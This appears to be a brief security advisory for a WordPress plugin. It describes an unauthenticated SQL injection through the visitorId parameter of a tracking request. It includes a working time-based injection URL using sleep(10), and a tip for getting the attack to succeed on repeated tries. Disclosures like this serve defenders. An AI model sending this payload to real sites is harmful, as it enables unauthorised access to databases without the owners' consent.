The plugin does not escape user input which is concatenated to an SQL query, allowing unauthenticated visitors to conduct SQL Injection attacks.
Note: The visitorId parameter's numerical prefix (before the %27) must be different on each try.
https://example.com/?wmcAction=wmcTrack&siteId=34&url=test&uid=01&pid=02&visitorId=132123%27,sleep(10),0,0,0,0,0);--+-